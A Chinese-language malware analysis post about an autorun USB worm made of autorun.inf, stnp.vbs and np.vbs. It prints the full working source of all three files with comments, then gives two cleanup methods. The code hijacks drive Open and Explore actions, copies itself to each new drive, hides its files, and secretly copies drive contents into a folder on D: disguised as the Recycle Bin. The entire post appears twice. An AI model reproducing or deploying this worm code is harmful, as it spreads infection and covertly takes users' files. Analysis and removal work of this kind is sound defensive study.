最新恶意复制型病毒autorun.inf,stNP.VBS,NP.VBS代码简单解析和解决方法
最新恶意复制型病毒autorun.inf,stnp.vbs,np.vbs
及代码分析与病毒处理两种方法
方法一:来自于指间轻舞
此病毒最大的特点在于中毒后,自动感染你的硬盘根目录,并复制病毒文件。无论你是采用双击,还是右键选择打开,或者运行资源管理器都会自动运行其代码(病毒),所以中此病毒后,新手往往打不开盘符,导致数据无法读取。
下面是病毒的代码分析。文件总共有三个,都很简单,已经加上了注解。
文件名:autorun.inf
; autorun.inf as dropped into the root of every newly detected drive (written by add_autorun in np.vbs).
; Defender note: the launch vector is Explorer's handling of the shell verbs below; a host that
; ignores autorun.inf on removable media never runs stnp.vbs from here.
[autorun]
; No classic AutoRun program is registered; the hijack is done through the shell verbs instead.
open=
; Replaces the drive's "Open" verb (label 打开(&o)) so that double-clicking the drive icon runs the
; launcher stnp.vbs with wscript.exe. The path is relative: stnp.vbs must sit in the same root.
shell\open=打开(&o)
shell\open\command=wscript.exe stnp.vbs
; Apparently meant to make the hijacked "Open" verb the default action (not a standard
; autorun.inf key as far as I know - TODO confirm).
shell\open\default=1
; Same hijack for the right-click "Explore" verb (label 资源管理器(&x)).
shell\explore=资源管理器(&x)
shell\explore\command=wscript.exe stnp.vbs
文件名:stnp.vbs
功能是检测当前目录下的np.vbs是否存在,存在则把它复制到d:\np.vbs并运行
' stnp.vbs: first-stage launcher started by the hijacked autorun.inf verbs ("wscript.exe stnp.vbs").
' Its only job is to copy the worm body np.vbs to d:\np.vbs and start it from there.
' Defender note: the process chain explorer.exe -> wscript.exe stnp.vbs -> wscript.exe d:\np.vbs
' and the file d:\np.vbs are the observable artifacts of this stage.
' Suppress every runtime error so a missing file or a locked attribute never stops the script.
on error resume next
' The ProgID is split into two string pieces, presumably to defeat naive string matching on
' "scripting.filesystemobject" (TODO confirm intent; the runtime result is the same object).
set fso = createobject("scripting.filesys"&"temobject")
' FileExists returns True (-1 in VBScript): only act when np.vbs is in the current directory
' (presumably the infected drive's root, where autorun.inf launched this script from).
if fso.fileexists("np.vbs") = -1 then
' Remove any previous copy at d:\np.vbs first so the overwrite below cannot fail on attributes.
if fso.fileexists("d:\np.vbs") = -1 then
set f = fso.getfile("d:\np.vbs")
' Clear the attribute bits (copies written by np.vbs carry ReadOnly+Hidden+System = 7).
if f.attributes = 0 then
else
f.attributes = 0
end if
' Force-delete.
f.delete(true)
end if
' Copy the worm body to the fixed drive D: (third argument True = overwrite) and run it from there.
fso.copyfile "np.vbs", "d:\np.vbs", true
set wshshell = wscript.createobject("wscript.shell")
wshshell.run "d:\np.vbs"
end if
文件名:np.vbs
-----
'[natruepark]
' np.vbs: worm body. Runs for roughly 8 hours per launch, polling the drive list every 10 s.
' Every drive that appears during that time gets np.vbs / stnp.vbs / autorun.inf written to its
' root with ReadOnly+Hidden+System attributes, and its contents are copied into a hidden folder
' under d:\recyc1ed\ that is disguised as the Recycle Bin.
' Defender note: artifacts to look for are those three root files on each drive, the folder
' d:\recyc1ed\, and the transient scratch files c:\np.bin, c:\a.bin, c:\d.bin and c:\s.bin.
' Error suppression: every failure (locked file, missing folder, ...) is silently ignored.
on error resume next
' Globals shared with the functions below. old_drs/old_n hold the drive letters seen at the
' previous poll (baseline), new_drs/new_n the current poll (filled by scan_disk).
' new_yn is declared but never used.
dim fso, old_drs(), new_drs(), old_n, new_n, new_yn, wshshell
' ProgID split into two string pieces (same object as "scripting.filesystemobject").
set fso = createobject("scripting.file"&"systemobject")
set wshshell = wscript.createobject("wscript.shell")
' Seed the baseline with one entry. The value "c" is never compared anywhere; what matters is
' old_n = 0, which makes the first drive enumerated by fso.drives (normally the first fixed
' drive) count as already processed, so it is never written to.
old_n=0
redim old_drs(old_n)
old_drs(0)="c"
'[main part]
' Open an Explorer window on the current directory, presumably so the user who double-clicked
' the drive still sees the window they expected (TODO confirm).
wshshell.run("explorer .\")
dim i
i = 0
' 8*360 = 2880 iterations with a 10 s sleep each: about 8 hours of polling per launch.
do while i>=0 and i<8*360
scan_disk()
' judge_new_disk returns 1 only when the number of ready drives grew since the last poll.
if judge_new_disk() = 1 then
dim left_n
left_n = 1
' Visit every drive index beyond the baseline count: old_n+1 .. new_n.
do while left_n<=(new_n-old_n)
' Root path of the new drive, e.g. "e:\".
new_disk = new_drs(left_n+old_n)&":\"
'-----------------<maintenance block: (re)install the three files on the new drive>-----------------
' FileExists = -1 (True): copy this script to <root>np.vbs only when it is not there yet.
if fso.fileexists(new_disk&"np.vbs") = -1 then
else
self_copy(new_disk)
end if
' Attribute 7 = ReadOnly+Hidden+System; hidden under Explorer's default settings.
add_attrib(new_disk&"np.vbs")
' An existing autorun.inf is un-hidden first, then always overwritten with the hijacking one.
if fso.fileexists(new_disk&"autorun.inf") = -1 then
del_attrib(new_disk&"autorun.inf")
end if
add_autorun(new_disk)
add_attrib(new_disk&"autorun.inf")
' The launcher stnp.vbs is written only when missing.
if fso.fileexists(new_disk&"stnp.vbs") = -1 then
else
add_stnp(new_disk)
end if
add_attrib(new_disk&"stnp.vbs")
'-----------------</maintenance block>-----------------
'-----------------<payload block: copy the new drive's contents to a hidden folder on D:>-----------------
dim rec
' Staging folder on the fixed drive D:. Note the digit "1" in "recyc1ed", a look-alike of "Recycled".
rec = "d:\recyc1ed\"
if fso.folderexists(rec) = -1 then
else
fso.createfolder(rec)
end if
' Folder attribute 7 (ReadOnly+Hidden+System) plus the desktop.ini written by add_desktop
' (Recycle Bin CLSID) make Explorer present this folder as a Recycle Bin.
add_attribf(rec)
if fso.fileexists(rec&"desktop.ini") = -1 then
else
add_desktop(rec)
end if
add_attrib(rec&"desktop.ini")
' One sub-folder per pass, named from the locale-formatted date plus a random fraction
' (e.g. rec & "2009-1-1" & "0.7055475" - constructed example; the date format is locale dependent).
aim_folder = rec&date()&rnd()
if fso.folderexists(aim_folder) = -1 then
else
fso.createfolder(aim_folder)
end if
' Targeted copy: a folder literally named 汽轮机原理 ("steam turbine principles") at the root of
' the new drive is copied into the staging folder when present.
if fso.folderexists(new_disk&"汽轮机原理") = -1 then
fso.copyfolder new_disk&"汽轮机原理", aim_folder, true
add_attribf(aim_folder)
end if
' General copy: skipped whenever the baseline count is 0 (in particular on the first poll),
' presumably so the drives present at start-up are not duplicated. Note it copies
' new_drs(new_n) - the last drive enumerated - rather than new_disk, so when several drives
' appear at once the same drive is copied on every pass of this inner loop.
if old_n = 0 then
else
set fp = fso.getfolder(new_drs(new_n)&":\")
set fc = fp.subfolders
for each f in fc
fso.copyfolder f&"", aim_folder&"\"&f.name, true
next
set fc = fp.files
for each f in fc
fso.copyfile f&"", aim_folder&"\", true
next
add_attribf(aim_folder)
end if
'-----------------</payload block>-----------------
left_n=left_n+1
loop
' Make the current drive list the baseline for the next poll.
copy_disk()
end if
' 10 000 ms between polls.
wscript.sleep(10000)
i=i+1
loop
'[函数部分]
'可用驱动器检测 new_drs(),new_n
' Enumerate the ready drives into the globals new_drs()/new_n (new_n = highest index, -1 if none).
function scan_disk()
dim d, dr
' -1 sentinel so that the first ready drive lands at index 0.
new_n = -1
set dr = fso.drives
for each d in dr
' IsReady is False for empty removable slots, so only mounted media are listed.
if d.isready then
new_n=new_n+1
' Grow the array one element at a time, keeping the earlier letters.
redim preserve new_drs(new_n)
' Drive letter only (no colon); callers append ":\".
new_drs(new_n)=d.driveletter
end if
next
end function
'判断是否有新加入的驱动器
' Compare the drive count from scan_disk with the baseline.
' Returns 1 when the number of ready drives increased, 0 otherwise.
' Only counts are compared, never letters: swapping one removable drive for another between two
' polls leaves the count unchanged and goes unnoticed.
function judge_new_disk()
if new_n = old_n then
judge_new_disk = 0
elseif new_n < old_n then
' A drive went away: shrink the baseline to the current count.
redim preserve old_drs(new_n)
old_n = new_n
judge_new_disk = 0
elseif new_n > old_n then
' Grow the baseline array now; old_n itself is updated later by copy_disk, after the main
' loop has processed indices old_n+1 .. new_n.
redim preserve old_drs(new_n)
judge_new_disk = 1
end if
end function
'复制新驱动器表单
' Make the current drive list the baseline: old_drs(0..new_n) := new_drs(0..new_n), old_n := new_n.
' Relies on judge_new_disk having already resized old_drs to new_n.
function copy_disk()
dim n
n=0
do while n<=new_n
old_drs(n) = new_drs(n)
n=n+1
loop
old_n = new_n
end function
'添加指定文件属性
' Set the attributes of the given file to 7 = ReadOnly(1)+Hidden(2)+System(4) unless already so.
' With Explorer's default "Hide protected operating system files" setting such a file is invisible,
' which is why the clean-up steps on this page start by turning that option off.
' f is not declared locally (no Option Explicit), so it is an implicit global.
function add_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'删除指定文件属性
' Clear the attributes of the given file, but only when they are exactly 7 (the value add_attrib
' sets); any other combination is left untouched. The empty else branch is a no-op.
function del_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
f.attributes = 0
else
end if
end function
'自我复制到指定文件目录
' Copy the running script to <folder>np.vbs.
' Goes through a scratch file c:\np.bin (written, copied, deleted) instead of copying
' wscript.scriptfullname directly; the reason is not stated - a freshly written file starts
' with normal attributes, which may be the point (TODO confirm).
' self is an undeclared implicit global holding the script text; self_file is never closed.
' Defender note: c:\np.bin exists only briefly but is a usable file-creation indicator.
function self_copy(folder)
dim aim_path, mid_path, self_file, mid_file
aim_path = folder&"np.vbs"
mid_path = "c:\np.bin"
' Mode 1 = ForReading: read the whole text of the currently running script.
set self_file = fso.opentextfile(wscript.scriptfullname,1)
self = self_file.readall
' Mode 2 = ForWriting, create = True: (over)write the scratch file.
set mid_file = fso.opentextfile(mid_path,2,true)
mid_file.write self
mid_file.close
set mid_file = fso.getfile(mid_path)
mid_file.copy(aim_path)
' Force-delete the scratch file.
mid_file.delete(true)
end function
'增加autorun.inf
' Write the hijacking autorun.inf to <folder>autorun.inf via a scratch file c:\a.bin.
' The content is the autorun.inf shown at the top of this page: the drive's Open and Explore
' verbs are redirected to "wscript.exe stnp.vbs" (relative path, i.e. the stnp.vbs in the same root).
' temp and cop are undeclared implicit globals.
function add_autorun(folder)
dim path
path = folder&"autorun.inf"
' CreateTextFile(name, overwrite = True).
set temp = fso.createtextfile("c:\a.bin",true)
temp.writeline "[autorun]"
temp.writeline "open="
temp.writeline "shell\open=打开(&o)"
temp.writeline "shell\open\command=wscript.exe stnp.vbs"
temp.writeline "shell\open\default=1"
temp.writeline "shell\explore=资源管理器(&x)"
temp.writeline "shell\explore\command=wscript.exe stnp.vbs"
temp.close
' Copy the scratch file into place, then force-delete it.
set cop = fso.getfile("c:\a.bin")
cop.copy(path)
cop.delete(true)
end function
'增加desktop.ini
' Write <folder>desktop.ini via a scratch file c:\d.bin.
' The CLSID {645ff040-5081-101b-9f08-00aa002f954e} is the Recycle Bin's, so Explorer renders the
' (hidden+system) staging folder with the Recycle Bin icon and behaviour, disguising the copied files.
function add_desktop(folder)
dim path
path = folder&"desktop.ini"
set temp = fso.createtextfile("c:\d.bin",true)
temp.writeline "[.shellclassinfo]"
temp.writeline "clsid={645ff040-5081-101b-9f08-00aa002f954e}"
temp.close
' Copy the scratch file into place, then force-delete it.
set cop = fso.getfile("c:\d.bin")
cop.copy(path)
cop.delete(true)
end function
'增加stnp.vbs
' Write the launcher stnp.vbs to <folder>stnp.vbs via a scratch file c:\s.bin.
' The text written is the stnp.vbs shown earlier on this page; chr(34) stands for the embedded
' double-quote characters.
function add_stnp(folder)
dim path
' Re-creates the FileSystemObject (rebinds the global fso; harmless).
set fso = createobject("scripting.file"&"systemobject")
path = folder&"stnp.vbs"
set temp = fso.createtextfile("c:\s.bin",true)
' One writeline per line of stnp.vbs.
temp.writeline "on error resume next"
temp.writeline "set fso = createobject("&chr(34)&"scripting.filesys"&chr(34)&"&"&chr(34)&"temobject"&chr(34)&")"
temp.writeline "if fso.fileexists("&chr(34)&"np.vbs"&chr(34)&") = -1 then"
temp.writeline "if fso.fileexists("&chr(34)&"d:\np.vbs"&chr(34)&") = -1 then"
temp.writeline "set f = fso.getfile("&chr(34)&"d:\np.vbs"&chr(34)&")"
temp.writeline "if f.attributes = 0 then"
temp.writeline "else"
temp.writeline "f.attributes = 0"
temp.writeline "end if"
temp.writeline "f.delete(true)"
temp.writeline "end if"
temp.writeline "fso.copyfile "&chr(34)&"np.vbs"&chr(34)&", "&chr(34)&"d:\np.vbs"&chr(34)&", true"
temp.writeline "set wshshell = wscript.createobject("&chr(34)&"wscript.shell"&chr(34)&")"
temp.writeline "wshshell.run "&chr(34)&"d:\np.vbs"&chr(34)
temp.writeline "end if"
temp.close
' Copy the scratch file into place, then force-delete it.
set cop = fso.getfile("c:\s.bin")
cop.copy(path)
cop.delete(true)
end function
'添加指定文件夹属性
' Folder counterpart of add_attrib: set the folder's attributes to 7 = ReadOnly+Hidden+System
' unless already so. Used on d:\recyc1ed\ and on each staging sub-folder.
function add_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'删除指定文件夹属性
' Folder counterpart of del_attrib: reset the folder's attributes to 0 unless already 0.
' Not called anywhere in the script shown on this page.
function del_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 0 then
else
f.attributes = 0
end if
end function
' Reached only after the polling loop above runs out (about 8 hours): shows "thank you!!"
' (a dialog under wscript.exe) and exits.
wscript.echo("thank you!!")
wscript.quit
病毒好像有点良心,不会感染c盘(脚本启动时就把第一个盘符记入old_drs,只处理之后新出现的盘符),所以解决的方法还是有的:用资源管理器打开c盘,然后在左边展开其他盘符,在工具-文件夹-查看中去掉"隐藏受保护的系统文件"的钩并选择查看所有文件。将各个盘符隐藏的以上三个文件删除,重新启动即可。另外,脚本还会在d:\recyc1ed\下建立隐藏、系统属性的文件夹来存放复制来的文件,清理时也应一并检查并删除。
方法二:作者刚成功操作得出
只需要进入WinPE之后,查找np.vbs就可以连stnp.vbs一起全部查出,删除这些恶魔即可!!!各盘根目录下隐藏的autorun.inf也要一并删除。
及代码分析与病毒处理两种方法
方法一:来自于指间轻舞
此病毒最大的特点在于中毒后,自动感染你的硬盘根目录,并复制病毒文件。无论你是采用双击,还是右键选择打开,或者运行资源管理器都会自动运行其代码(病毒),所以中此病毒后,新手往往打不开盘符,导致数据无法读取。
下面是病毒的代码分析。文件总共有三个,都很简单,已经加上了注解。
文件名:autorun.inf
; autorun.inf as dropped into the root of every newly detected drive (written by add_autorun in np.vbs).
; Defender note: the launch vector is Explorer's handling of the shell verbs below; a host that
; ignores autorun.inf on removable media never runs stnp.vbs from here.
[autorun]
; No classic AutoRun program is registered; the hijack is done through the shell verbs instead.
open=
; Replaces the drive's "Open" verb (label 打开(&o)) so that double-clicking the drive icon runs the
; launcher stnp.vbs with wscript.exe. The path is relative: stnp.vbs must sit in the same root.
shell\open=打开(&o)
shell\open\command=wscript.exe stnp.vbs
; Apparently meant to make the hijacked "Open" verb the default action (not a standard
; autorun.inf key as far as I know - TODO confirm).
shell\open\default=1
; Same hijack for the right-click "Explore" verb (label 资源管理器(&x)).
shell\explore=资源管理器(&x)
shell\explore\command=wscript.exe stnp.vbs
文件名:stnp.vbs
功能是检测当前目录下的np.vbs是否存在,存在则把它复制到d:\np.vbs并运行
' stnp.vbs: first-stage launcher started by the hijacked autorun.inf verbs ("wscript.exe stnp.vbs").
' Its only job is to copy the worm body np.vbs to d:\np.vbs and start it from there.
' Defender note: the process chain explorer.exe -> wscript.exe stnp.vbs -> wscript.exe d:\np.vbs
' and the file d:\np.vbs are the observable artifacts of this stage.
' Suppress every runtime error so a missing file or a locked attribute never stops the script.
on error resume next
' The ProgID is split into two string pieces, presumably to defeat naive string matching on
' "scripting.filesystemobject" (TODO confirm intent; the runtime result is the same object).
set fso = createobject("scripting.filesys"&"temobject")
' FileExists returns True (-1 in VBScript): only act when np.vbs is in the current directory
' (presumably the infected drive's root, where autorun.inf launched this script from).
if fso.fileexists("np.vbs") = -1 then
' Remove any previous copy at d:\np.vbs first so the overwrite below cannot fail on attributes.
if fso.fileexists("d:\np.vbs") = -1 then
set f = fso.getfile("d:\np.vbs")
' Clear the attribute bits (copies written by np.vbs carry ReadOnly+Hidden+System = 7).
if f.attributes = 0 then
else
f.attributes = 0
end if
' Force-delete.
f.delete(true)
end if
' Copy the worm body to the fixed drive D: (third argument True = overwrite) and run it from there.
fso.copyfile "np.vbs", "d:\np.vbs", true
set wshshell = wscript.createobject("wscript.shell")
wshshell.run "d:\np.vbs"
end if
文件名:np.vbs
-----
'[natruepark]
' np.vbs: worm body. Runs for roughly 8 hours per launch, polling the drive list every 10 s.
' Every drive that appears during that time gets np.vbs / stnp.vbs / autorun.inf written to its
' root with ReadOnly+Hidden+System attributes, and its contents are copied into a hidden folder
' under d:\recyc1ed\ that is disguised as the Recycle Bin.
' Defender note: artifacts to look for are those three root files on each drive, the folder
' d:\recyc1ed\, and the transient scratch files c:\np.bin, c:\a.bin, c:\d.bin and c:\s.bin.
' Error suppression: every failure (locked file, missing folder, ...) is silently ignored.
on error resume next
' Globals shared with the functions below. old_drs/old_n hold the drive letters seen at the
' previous poll (baseline), new_drs/new_n the current poll (filled by scan_disk).
' new_yn is declared but never used.
dim fso, old_drs(), new_drs(), old_n, new_n, new_yn, wshshell
' ProgID split into two string pieces (same object as "scripting.filesystemobject").
set fso = createobject("scripting.file"&"systemobject")
set wshshell = wscript.createobject("wscript.shell")
' Seed the baseline with one entry. The value "c" is never compared anywhere; what matters is
' old_n = 0, which makes the first drive enumerated by fso.drives (normally the first fixed
' drive) count as already processed, so it is never written to.
old_n=0
redim old_drs(old_n)
old_drs(0)="c"
'[main part]
' Open an Explorer window on the current directory, presumably so the user who double-clicked
' the drive still sees the window they expected (TODO confirm).
wshshell.run("explorer .\")
dim i
i = 0
' 8*360 = 2880 iterations with a 10 s sleep each: about 8 hours of polling per launch.
do while i>=0 and i<8*360
scan_disk()
' judge_new_disk returns 1 only when the number of ready drives grew since the last poll.
if judge_new_disk() = 1 then
dim left_n
left_n = 1
' Visit every drive index beyond the baseline count: old_n+1 .. new_n.
do while left_n<=(new_n-old_n)
' Root path of the new drive, e.g. "e:\".
new_disk = new_drs(left_n+old_n)&":\"
'-----------------<maintenance block: (re)install the three files on the new drive>-----------------
' FileExists = -1 (True): copy this script to <root>np.vbs only when it is not there yet.
if fso.fileexists(new_disk&"np.vbs") = -1 then
else
self_copy(new_disk)
end if
' Attribute 7 = ReadOnly+Hidden+System; hidden under Explorer's default settings.
add_attrib(new_disk&"np.vbs")
' An existing autorun.inf is un-hidden first, then always overwritten with the hijacking one.
if fso.fileexists(new_disk&"autorun.inf") = -1 then
del_attrib(new_disk&"autorun.inf")
end if
add_autorun(new_disk)
add_attrib(new_disk&"autorun.inf")
' The launcher stnp.vbs is written only when missing.
if fso.fileexists(new_disk&"stnp.vbs") = -1 then
else
add_stnp(new_disk)
end if
add_attrib(new_disk&"stnp.vbs")
'-----------------</maintenance block>-----------------
'-----------------<payload block: copy the new drive's contents to a hidden folder on D:>-----------------
dim rec
' Staging folder on the fixed drive D:. Note the digit "1" in "recyc1ed", a look-alike of "Recycled".
rec = "d:\recyc1ed\"
if fso.folderexists(rec) = -1 then
else
fso.createfolder(rec)
end if
' Folder attribute 7 (ReadOnly+Hidden+System) plus the desktop.ini written by add_desktop
' (Recycle Bin CLSID) make Explorer present this folder as a Recycle Bin.
add_attribf(rec)
if fso.fileexists(rec&"desktop.ini") = -1 then
else
add_desktop(rec)
end if
add_attrib(rec&"desktop.ini")
' One sub-folder per pass, named from the locale-formatted date plus a random fraction
' (e.g. rec & "2009-1-1" & "0.7055475" - constructed example; the date format is locale dependent).
aim_folder = rec&date()&rnd()
if fso.folderexists(aim_folder) = -1 then
else
fso.createfolder(aim_folder)
end if
' Targeted copy: a folder literally named 汽轮机原理 ("steam turbine principles") at the root of
' the new drive is copied into the staging folder when present.
if fso.folderexists(new_disk&"汽轮机原理") = -1 then
fso.copyfolder new_disk&"汽轮机原理", aim_folder, true
add_attribf(aim_folder)
end if
' General copy: skipped whenever the baseline count is 0 (in particular on the first poll),
' presumably so the drives present at start-up are not duplicated. Note it copies
' new_drs(new_n) - the last drive enumerated - rather than new_disk, so when several drives
' appear at once the same drive is copied on every pass of this inner loop.
if old_n = 0 then
else
set fp = fso.getfolder(new_drs(new_n)&":\")
set fc = fp.subfolders
for each f in fc
fso.copyfolder f&"", aim_folder&"\"&f.name, true
next
set fc = fp.files
for each f in fc
fso.copyfile f&"", aim_folder&"\", true
next
add_attribf(aim_folder)
end if
'-----------------</payload block>-----------------
left_n=left_n+1
loop
' Make the current drive list the baseline for the next poll.
copy_disk()
end if
' 10 000 ms between polls.
wscript.sleep(10000)
i=i+1
loop
'[函数部分]
'可用驱动器检测 new_drs(),new_n
' Enumerate the ready drives into the globals new_drs()/new_n (new_n = highest index, -1 if none).
function scan_disk()
dim d, dr
' -1 sentinel so that the first ready drive lands at index 0.
new_n = -1
set dr = fso.drives
for each d in dr
' IsReady is False for empty removable slots, so only mounted media are listed.
if d.isready then
new_n=new_n+1
' Grow the array one element at a time, keeping the earlier letters.
redim preserve new_drs(new_n)
' Drive letter only (no colon); callers append ":\".
new_drs(new_n)=d.driveletter
end if
next
end function
'判断是否有新加入的驱动器
' Compare the drive count from scan_disk with the baseline.
' Returns 1 when the number of ready drives increased, 0 otherwise.
' Only counts are compared, never letters: swapping one removable drive for another between two
' polls leaves the count unchanged and goes unnoticed.
function judge_new_disk()
if new_n = old_n then
judge_new_disk = 0
elseif new_n < old_n then
' A drive went away: shrink the baseline to the current count.
redim preserve old_drs(new_n)
old_n = new_n
judge_new_disk = 0
elseif new_n > old_n then
' Grow the baseline array now; old_n itself is updated later by copy_disk, after the main
' loop has processed indices old_n+1 .. new_n.
redim preserve old_drs(new_n)
judge_new_disk = 1
end if
end function
'复制新驱动器表单
' Make the current drive list the baseline: old_drs(0..new_n) := new_drs(0..new_n), old_n := new_n.
' Relies on judge_new_disk having already resized old_drs to new_n.
function copy_disk()
dim n
n=0
do while n<=new_n
old_drs(n) = new_drs(n)
n=n+1
loop
old_n = new_n
end function
'添加指定文件属性
' Set the attributes of the given file to 7 = ReadOnly(1)+Hidden(2)+System(4) unless already so.
' With Explorer's default "Hide protected operating system files" setting such a file is invisible,
' which is why the clean-up steps on this page start by turning that option off.
' f is not declared locally (no Option Explicit), so it is an implicit global.
function add_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'删除指定文件属性
' Clear the attributes of the given file, but only when they are exactly 7 (the value add_attrib
' sets); any other combination is left untouched. The empty else branch is a no-op.
function del_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
f.attributes = 0
else
end if
end function
'自我复制到指定文件目录
' Copy the running script to <folder>np.vbs.
' Goes through a scratch file c:\np.bin (written, copied, deleted) instead of copying
' wscript.scriptfullname directly; the reason is not stated - a freshly written file starts
' with normal attributes, which may be the point (TODO confirm).
' self is an undeclared implicit global holding the script text; self_file is never closed.
' Defender note: c:\np.bin exists only briefly but is a usable file-creation indicator.
function self_copy(folder)
dim aim_path, mid_path, self_file, mid_file
aim_path = folder&"np.vbs"
mid_path = "c:\np.bin"
' Mode 1 = ForReading: read the whole text of the currently running script.
set self_file = fso.opentextfile(wscript.scriptfullname,1)
self = self_file.readall
' Mode 2 = ForWriting, create = True: (over)write the scratch file.
set mid_file = fso.opentextfile(mid_path,2,true)
mid_file.write self
mid_file.close
set mid_file = fso.getfile(mid_path)
mid_file.copy(aim_path)
' Force-delete the scratch file.
mid_file.delete(true)
end function
'增加autorun.inf
' Write the hijacking autorun.inf to <folder>autorun.inf via a scratch file c:\a.bin.
' The content is the autorun.inf shown at the top of this page: the drive's Open and Explore
' verbs are redirected to "wscript.exe stnp.vbs" (relative path, i.e. the stnp.vbs in the same root).
' temp and cop are undeclared implicit globals.
function add_autorun(folder)
dim path
path = folder&"autorun.inf"
' CreateTextFile(name, overwrite = True).
set temp = fso.createtextfile("c:\a.bin",true)
temp.writeline "[autorun]"
temp.writeline "open="
temp.writeline "shell\open=打开(&o)"
temp.writeline "shell\open\command=wscript.exe stnp.vbs"
temp.writeline "shell\open\default=1"
temp.writeline "shell\explore=资源管理器(&x)"
temp.writeline "shell\explore\command=wscript.exe stnp.vbs"
temp.close
' Copy the scratch file into place, then force-delete it.
set cop = fso.getfile("c:\a.bin")
cop.copy(path)
cop.delete(true)
end function
'增加desktop.ini
' Write <folder>desktop.ini via a scratch file c:\d.bin.
' The CLSID {645ff040-5081-101b-9f08-00aa002f954e} is the Recycle Bin's, so Explorer renders the
' (hidden+system) staging folder with the Recycle Bin icon and behaviour, disguising the copied files.
function add_desktop(folder)
dim path
path = folder&"desktop.ini"
set temp = fso.createtextfile("c:\d.bin",true)
temp.writeline "[.shellclassinfo]"
temp.writeline "clsid={645ff040-5081-101b-9f08-00aa002f954e}"
temp.close
' Copy the scratch file into place, then force-delete it.
set cop = fso.getfile("c:\d.bin")
cop.copy(path)
cop.delete(true)
end function
'增加stnp.vbs
' Write the launcher stnp.vbs to <folder>stnp.vbs via a scratch file c:\s.bin.
' The text written is the stnp.vbs shown earlier on this page; chr(34) stands for the embedded
' double-quote characters.
function add_stnp(folder)
dim path
' Re-creates the FileSystemObject (rebinds the global fso; harmless).
set fso = createobject("scripting.file"&"systemobject")
path = folder&"stnp.vbs"
set temp = fso.createtextfile("c:\s.bin",true)
' One writeline per line of stnp.vbs.
temp.writeline "on error resume next"
temp.writeline "set fso = createobject("&chr(34)&"scripting.filesys"&chr(34)&"&"&chr(34)&"temobject"&chr(34)&")"
temp.writeline "if fso.fileexists("&chr(34)&"np.vbs"&chr(34)&") = -1 then"
temp.writeline "if fso.fileexists("&chr(34)&"d:\np.vbs"&chr(34)&") = -1 then"
temp.writeline "set f = fso.getfile("&chr(34)&"d:\np.vbs"&chr(34)&")"
temp.writeline "if f.attributes = 0 then"
temp.writeline "else"
temp.writeline "f.attributes = 0"
temp.writeline "end if"
temp.writeline "f.delete(true)"
temp.writeline "end if"
temp.writeline "fso.copyfile "&chr(34)&"np.vbs"&chr(34)&", "&chr(34)&"d:\np.vbs"&chr(34)&", true"
temp.writeline "set wshshell = wscript.createobject("&chr(34)&"wscript.shell"&chr(34)&")"
temp.writeline "wshshell.run "&chr(34)&"d:\np.vbs"&chr(34)
temp.writeline "end if"
temp.close
' Copy the scratch file into place, then force-delete it.
set cop = fso.getfile("c:\s.bin")
cop.copy(path)
cop.delete(true)
end function
'添加指定文件夹属性
' Folder counterpart of add_attrib: set the folder's attributes to 7 = ReadOnly+Hidden+System
' unless already so. Used on d:\recyc1ed\ and on each staging sub-folder.
function add_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'删除指定文件夹属性
' Folder counterpart of del_attrib: reset the folder's attributes to 0 unless already 0.
' Not called anywhere in the script shown on this page.
function del_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 0 then
else
f.attributes = 0
end if
end function
' Reached only after the polling loop above runs out (about 8 hours): shows "thank you!!"
' (a dialog under wscript.exe) and exits.
wscript.echo("thank you!!")
wscript.quit
病毒好像有点良心,不会感染c盘(脚本启动时就把第一个盘符记入old_drs,只处理之后新出现的盘符),所以解决的方法还是有的:用资源管理器打开c盘,然后在左边展开其他盘符,在工具-文件夹-查看中去掉"隐藏受保护的系统文件"的钩并选择查看所有文件。将各个盘符隐藏的以上三个文件删除,重新启动即可。另外,脚本还会在d:\recyc1ed\下建立隐藏、系统属性的文件夹来存放复制来的文件,清理时也应一并检查并删除。
方法二:作者刚成功操作得出
只需要进入WinPE之后,查找np.vbs就可以连stnp.vbs一起全部查出,删除这些恶魔即可!!!各盘根目录下隐藏的autorun.inf也要一并删除。